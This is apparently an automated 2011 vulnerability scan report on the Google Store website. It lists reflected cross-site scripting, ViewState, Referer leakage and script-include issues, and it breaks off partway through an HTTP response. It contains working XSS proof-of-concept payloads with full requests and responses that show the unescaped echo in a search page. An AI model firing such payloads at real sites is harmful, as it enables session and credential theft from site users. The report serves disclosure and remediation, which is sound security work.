XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, Search, googlestore.com
Report generated by XSS.CX at Fri Oct 21 14:38:47 CDT 2011.
1. Cross-site scripting (reflected)
1.1. http://www.googlestore.com/googlesearch.aspx [category parameter]
1.2. http://www.googlestore.com/googlesearch.aspx [name of an arbitrarily supplied request parameter]
1.3. http://www.googlestore.com/googlesearch.aspx [q parameter]
1.4. http://www.googlestore.com/googlesearch.aspx [x parameter]
1.5. http://www.googlestore.com/googlesearch.aspx [y parameter]
2. ASP.NET ViewState without MAC enabled
2.1. http://www.googlestore.com/Wearables/Organic+Black+is+Back+T-Shirt.axd
2.2. http://www.googlestore.com/googlesearch.aspx
2.3. http://www.googlestore.com/shop.axd/PrivacyPolicy
2.4. http://www.googlestore.com/shoppingcart.aspx
3. Cross-domain Referer leakage
3.1. http://www.googlestore.com/googlesearch.aspx
3.2. http://www.googlestore.com/shoppingcart.aspx
3.3. http://www.googlestore.com/shoppingcart.aspx
4. Cross-domain script include
4.1. http://www.googlestore.com/Eco/American+Apparel+Ladies+Organic+Tee.axd
4.2. http://www.googlestore.com/Mini/
4.3. http://www.googlestore.com/Mini/Google+Mini+2+0+300K+-+2+YR.axd
4.4. http://www.googlestore.com/Office/Momentum+Computer+Portfolio.axd
4.5. http://www.googlestore.com/Office/Pack+of+10+Recycled+Paper+Pencils.axd
4.6. http://www.googlestore.com/Office/Reversible+Neoprene+Laptop+Sleeve.axd
4.7. http://www.googlestore.com/Wearables/Organic+Black+is+Back+T-Shirt.axd
4.8. http://www.googlestore.com/Wearables/Tiki+Android+T-Shirt.axd
4.9. http://www.googlestore.com/googlesearch.aspx
4.10. http://www.googlestore.com/shop.axd/Home
4.11. http://www.googlestore.com/shop.axd/PrivacyPolicy
4.12. http://www.googlestore.com/shoppingcart.aspx
5. Email addresses disclosed
1. Cross-site scripting (reflected)
next
There are 5 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.googlestore.com/googlesearch.aspx [category parameter]
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://www.googlestore.com |
Path: |
/googlesearch.aspx |
Issue detail
The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e88ac'><script>alert(1)</script>f4213a3933b was submitted in the category parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /googlesearch.aspx?category=accessoriese88ac'><script>alert(1)</script>f4213a3933b&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0 HTTP/1.1 Host: www.googlestore.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.googlestore.com/googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0 Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.43.9.1319224888597; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true Content-Type: application/x-www-form-urlencoded Content-Length: 2709
__VIEWSTATE=%2FwEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAWxAzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc%2BQmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmFzY2VuZGluZyc%2BUHJpY2UgKCQtJCQkKTwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmRlc2NlbmRpbmcnPlByaWNlICgkJCQtJCk8L2E%2BPGJyLz5kAgEPFgIeB1Zpc2libGVoFgICAQ8WAh8AZWQCAg8WAh8BaBYCAgEPFgIfAGVkAgMPFgIfAWgWAgIBDxYCHwBlZAIEDxYCHwBlZAIFDxYCHwAF0QI8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweCc%2BSG9tZTwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQnLz5hY2Nlc3NvcmllczwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FY2F0ZWdvcnk9YWNjZXNzb3JpZXMnLz54c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQ8L2E%2BZAIGDxYCHwBlZAIHDxYCHwAFnQI8aDI%2BPGNlbnRlcj5EaWQgeW91IG1lYW4gPGk%2BPGZvbnQgY29sb3I9J2JsdWUnID4gPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FY2F0ZWdvcnk9YWNjZXNzb3JpZXMmeD0wJnk9MCZxPXhzcyAxMjMgNDU2IDc4OTAgZjNkOCBzY3JpcHQgYWxlcnQoZG9jdW1lbnQubG9jYXRpb24pL3NjcmlwdCAxNzM0OWYzNzQ4NCcvPiB4c3MgMTIzIDQ1NiA3ODkwIGYzZDggc2NyaXB0IGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQgMTczNDlmMzc0ODQ8L2E%2BPzwvZm9udD48L2k%2BPC9oMj48L2NlbnRlcj5kAggPFgIfAAWKATxkaXYgY2xhc3M9Im5vLXJlc3VsdHMiPk5vIFJlc3VsdHMgRm91bmQgZm9yIHNlYXJjaCA8aT54c3MgMTIzIDQ1NiA3ODkwZjNkOGE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTwvc2NyaXB0PjE3MzQ5ZjM3NDg0PC9pPjwvZGl2PmQCCQ9kFgICAQ9kFgICAw8PFgIeCEltYWdlVXJsBRYvaW1hZ2VzL2J0bl9zaWdudXAuZ2lmZGQCCw8WAh8ABakDaHR0cHM6Ly93d3cuZ29vZ2xlYXBpcy5jb20vc2hvcHBpbmcvc2VhcmNoL3YxL2N4OjAxNjQ1ODUwMTY0NTg4NDA1NzkxMjpkcV9peGJ3aHVrOC9wcm9kdWN0cz9mYWNldHMuZW5hYmxlZD10cnVlJmNvdW50cnk9dXMmbWF4UmVzdWx0cz0xMiZmYWNldHMudXNlR2NzQ29uZmlnPVRydWUmZmFjZXRzLmRpc2NvdmVyPTEwMDoxMDAmYWx0PWF0b20mc3BlbGxpbmcuZW5hYmxlZD10cnVlJnByb21vdGlvbnMuZW5hYmxlZD10cnVlJnByb21vdGlvbnMudXNlR2NzQ29uZmlnPXRydWUma2V5PUFJemFTeUNTSk1hdjZheWdqbFYzenUwdmw0MGpick1oZEtmRmNybyZxPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YXNjcmlwdGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQxNzM0OWYzNzQ4NCZyZXN0cmljdEJ5PWdzY2F0ZWdvcnkodGV4dCk6YWNjZXNzb3JpZXNkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRNjdGxTaWdudXAkYnRuU2lnblVw&__EVENTVALIDATION=%2FwEWAwLdgJGXBAKs4eTNDgK6oZTsCg%3D%3D&ctlSignup%24EmailAddress=cdd&ctlSignup%24btnSignUp.x=37&ctlSignup%24btnSignUp.y=7 |
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20292 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 21 Oct 2011 19:26:53 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Google Online Store :: Product Search</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name='keywords' content='Google Online Store' /> <meta http-equiv="pragma" content="no-cache"> <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE"> <meta name='description' content='Google Online Store' /> <script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script> <link href="/css/main.css" rel="stylesheet" type="text/css" /> <link href="/css/home.css" rel="stylesheet" type="text/css" /> <!--[if lt IE 7]> <link href="/css/ielow.css" rel="stylesheet" type="text/css" /> <![endif]-->
<script type="text/javascript"> var r = Math.random(); var t = document.createElement("img"); t.onload = function() { var t2 = document.createElement("img"); t2.onload = function() { var t3 = document.createElement("img"); t3.onload = function() { return; }; t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r; }; t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r; }; t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r; </script> <noscript> <img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" /> </noscript> <style type="text/css"> .filterBox a{ line-height:18px; font-size:11px; } .facet_holder { margin:8px 0px; } .no-results{ font-weight:bold; font-size:1.3em; margin-bottom:25px; text-align:center} </style> <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />
</head> <body> <div id="wrapper"> <div id="header" style="height:70px"> <a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a> <div style="position:absolute; top:0; right:0px; width:90px; height:52px;"> <a href="/googlesearch.aspx?category=you tube"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a> </div> <ul> <li><a href="/googlesearch.aspx/?category=youtube">You Tube Home</a></li> <li><a href="http://www.google.com">Google Search</a></li> <li><a href="http://www.google.com/about.html">About Google</a></li> </ul> </div>
<div id="left_content"> <div id="box-round"> <div class="top"><span><h2 class="side_head">Search Filters</h2></span></div> <div class="center-content"> <div class="filterBox"> <div id="divsort_holder" class="facet_holder" style="margin-top:0px;"> <b>Sort By:</b><br/> <div id="divsort" name="divsort"><a href='googlesearch.aspx?'>Best Match</a><br/><a href='googlesearch.aspx?category=accessoriese88acscriptalert(1)/scriptf4213a3933b&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0&y=0&rankBy=price:ascending'>Price ($-$$$)</a><br/><a href='googlesearch.aspx?category=accessoriese88acscriptalert(1)/scriptf4213a3933b&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0&y=0&rankBy=price:descending'>Price ($$$-$)</a><br/></div> </div> <div class="facet_holder"> <b>Shop By Other:</b><br /> <div id="divshop" name="divshop"> <a href="googlesearch.aspx?topseller=yes">Top Sellers</a><br /> <a href="googlesearch.aspx?isnew=yes">What's New</a><br /> <a href="googlesearch.aspx?category=eco">Eco-Friendly Items</a><br /> <a href="googlesearch.aspx?specials=yes">Specials</a> </div> </div>
</div> <!-- filterBox --> </div> <!-- center-content -->
<div class="bottom"><span></span></div> </div> <!-- box-round --> </div> <!-- left content -->
<div id="content"> <script language="javascript"> function ajaxGetRequest(url, divName) { $("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Loading search results</h1><div style=\"height:40px;padding-top:10px;\"><p id=\"indicator\" style=\"margin-top:0px;\"><img src=\"/images/indicator.gif\" /> Loading...</p></div>");
$.ajax({ url: url, cache: true, success: function (html) { var isValid = html.indexOf("<div id=\"\products\">"); if (isValid != -1) { $("#" + divName).empty().html(html); } else { $("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Search results</h1>An error occurred. Try to search on the right-hand navigation for the products you are looking for.</div>"); } } })
} </script>
<div id="products">
<div id="category-head"> <form method="GET" name="search" id="search" action="googlesearch.aspx" style="font-size:15px;"> <b>Search:</b> <select name="category" style="font-size:13px;"> <option value="all">All Products</option> <option value="eco" >Eco-Friendly</option> <option value="wearables" >Wearables</option> <option value="youtube" >You Tube</option> <option value="accessories" >Accessories</option> <option value="office" >Office</option> <option value="kids" >Kids</option> <option value="fun" >Fun</option> <option value="apps" >Apps</option> </select>
<input name="q" id="q" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/> <input type="image" src="/images/btn_search.gif" class="button" value="search" /> </form>
<br /> <a href="/Specials/"><img border="0" src='/content/BannerImages/youtubesalebanner.jpg' alt=''></a> <br /> <div style="position:relative"> <h1>Displaying All Products</h1> <div style="clear:left"></div> </div>
<div id="top_paging"> <div class="paging_top" style="padding-right:15px;"> <div id="pagenav" name="pagename"></div> </div> <div id="divbreadcrumbs" name="divbreadcrumbs"><a href='googlesearch.aspx'>Home</a> / <a href='googlesearch.aspx?category=accessoriese88acscriptalert(1)/scriptf4213a3933b'/>xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484</a></div> </div>
<div style="clear:both"> </div>
<div id="divpromotions" name="divpromotions"></div> <div id="divspell" name="divspell"><h2><center>Did you mean <i><font color='blue' > <a href='googlesearch.aspx?category=accessoriese88ac'><script>alert(1)</script>f4213a3933b&x=0&y=0&q=xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484'/> xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484</a>?</font></i></h2></center></div> <div id="divsearchresults" name="divsearchresults"><div class="no-results">No Results Found for search <i>xss 123 456 7890f3d8a<script>alert(document.location)</script>17349f37484</i></div></div>
<div class="paging_bottom" id="pagenav_bottom"></div> </div> </div> </div>
<div id="right_content"> <style type="text/css"> .signup-tb{ width:135px; font-size:.9em; margin-top:5px; margin-bottom:5px; } .signup-btn{ font-size:.9em; } .lblMessage{ font-weight:bold; } .formsuccess{ font-weight:bold; color:green; } .formerror{ font-weight:bold; color:red; } </style> <div class="box-round" style="margin-bottom:10px;"> <div class="top"> <span> <h2 class="side_head">Newsletter Signup</h2> </span> </div> <div class="center-content"> <span id="ctlSignup_Label1" class="formerror">Invalid Email Format</span><br /> <form name="aspnetForm" method="post" action="#" id="aspnetForm"> <div> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAX7AzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc+QmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzZTg4YWNzY3JpcHRhbGVydCgxKS9zY3JpcHRmNDIxM2EzOTMzYiZxPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YSUzY3NjcmlwdCUzZWFsZXJ0JTI4ZG9jdW1lbnQubG9jYXRpb24lMjklM2MlMmZzY3JpcHQlM2UxNzM0OWYzNzQ4NCZ4PTAmeT0wJnJhbmtCeT1wcmljZTphc2NlbmRpbmcnPlByaWNlICgkLSQkJCk8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9jYXRlZ29yeT1hY2Nlc3Nvcmllc2U4OGFjc2NyaXB0YWxlcnQoMSkvc2NyaXB0ZjQyMTNhMzkzM2ImcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQmeD0wJnk9MCZyYW5rQnk9cHJpY2U6ZGVzY2VuZGluZyc+UHJpY2UgKCQkJC0kKTwvYT48YnIvPmQCAQ8WAh4HVmlzaWJsZWgWAgIBDxYCHwBlZAICDxYCHwFoFgICAQ8WAh8AZWQCAw8WAh8BaBYCAgEPFgIfAGVkAgQPFgIfAGVkAgUPFgIfAAXjATxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Jz5Ib21lPC9hPiZuYnNwOy8mbmJzcDs8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9jYXRlZ29yeT1hY2Nlc3Nvcmllc2U4OGFjc2NyaXB0YWxlcnQoMSkvc2NyaXB0ZjQyMTNhMzkzM2InLz54c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQ8L2E+ZAIGDxYCHwBlZAIHDxYCHwAFyAI8aDI+PGNlbnRlcj5EaWQgeW91IG1lYW4gPGk+PGZvbnQgY29sb3I9J2JsdWUnID4gPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/Y2F0ZWdvcnk9YWNjZXNzb3JpZXNlODhhYyc+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmY0MjEzYTM5MzNiJng9MCZ5PTAmcT14c3MgMTIzIDQ1NiA3ODkwIGYzZDggc2NyaXB0IGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQgMTczNDlmMzc0ODQnLz4geHNzIDEyMyA0NTYgNzg5MCBmM2Q4IHNjcmlwdCBhbGVydChkb2N1bWVudC5sb2NhdGlvbikvc2NyaXB0IDE3MzQ5ZjM3NDg0PC9hPj88L2ZvbnQ+PC9pPjwvaDI+PC9jZW50ZXI+ZAIIDxYCHwAFigE8ZGl2IGNsYXNzPSJuby1yZXN1bHRzIj5ObyBSZXN1bHRzIEZvdW5kIGZvciBzZWFyY2ggPGk+eHNzIDEyMyA0NTYgNzg5MGYzZDhhPHNjcmlwdD5hbGVydChkb2N1bWVudC5sb2NhdGlvbik8L3NjcmlwdD4xNzM0OWYzNzQ4NDwvaT48L2Rpdj5kAgkPZBYEZg8PFgYeCENzc0NsYXNzBQlmb3JtZXJyb3IeBFRleHQFFEludmFsaWQgRW1haWwgRm9ybWF0HgRfIVNCAgJkZAIBD2QWAgIDDw8WAh4ISW1hZ2VVcmwFFi9pbWFnZXMvYnRuX3NpZ251cC5naWZkZAILDxYCHwAFgQNodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbS9zaG9wcGluZy9zZWFyY2gvdjEvY3g6MDE2NDU4NTAxNjQ1ODg0MDU3OTEyOmRxX2l4YndodWs4L3Byb2R1Y3RzP2ZhY2V0cy5lbmFibGVkPXRydWUmY291bnRyeT11cyZtYXhSZXN1bHRzPTEyJmZhY2V0cy51c2VHY3NDb25maWc9VHJ1ZSZmYWNldHMuZGlzY292ZXI9MTAwOjEwMCZhbHQ9YXRvbSZzcGVsbGluZy5lbmFibGVkPXRydWUmcHJvbW90aW9ucy5lbmFibGVkPXRydWUmcHJvbW90aW9ucy51c2VHY3NDb25maWc9dHJ1ZSZrZXk9QUl6YVN5Q1NKTWF2NmF5Z2psVjN6dTB2bDQwamJyTWhkS2ZGY3JvJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhc2NyaXB0YWxlcnQoZG9jdW1lbnQubG9jYXRpb24pL3NjcmlwdDE3MzQ5ZjM3NDg0ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUTY3RsU2lnbnVwJGJ0blNpZ25VcA==" /> </div>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwK2qs6XAgKs4eTNDgK6oZTsCg==" /> </div> <input name="ctlSignup$EmailAddress" type="text" value="cdd" maxlength="50" id="ctlSignup_EmailAddress" class="signup-tb" /> <input type="image" name="ctlSignup$btnSignUp" id="ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" /> </form> </div> <div class="bottom"><span></span></div> </div>
<div class="box-round" > <div class="top"> <span> <h2 class="side_head">Store Links</h2> </span> </div>
<div class="center-content"> <ul class="store-links"> <li><a style="font-size:11px;" href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li> <li><a style="font-size:11px;" href="/shop.axd/Contact">Customer Service</a></li> <li><a style="font-size:11px;" href="/shop.axd/Contact#warranty">Warranty / Returns</a></li> <li><a style="font-size:11px;" href="/Mini/"><b>Google Mini</b></a></li> </ul> </div> <div class="bottom"><span></span></div> </div> <div class="box-round" style="margin-top:10px;"> <div class="top"><span><h2 class="side_head">Categories</h2></span></div> <div class="center-content"> <ul> <li class="nav off"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href="googlesearch.aspx?category=accessories" >Accessories</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href="googlesearch.aspx?category=fun" >Fun</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href="googlesearch.aspx?category=kids" >Kids</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href="googlesearch.aspx?category=office" >Office</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href="googlesearch.aspx?category=wearables" >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a> </ul> </div>
<div class="bottom"><span></span></div> </div> <div class="box-round" style="margin-top:10px;"> <div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div> <div class="center-content"> <ul class="eco_guide"> <li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li> <li style="background:url(/images/greeninitiative/2 |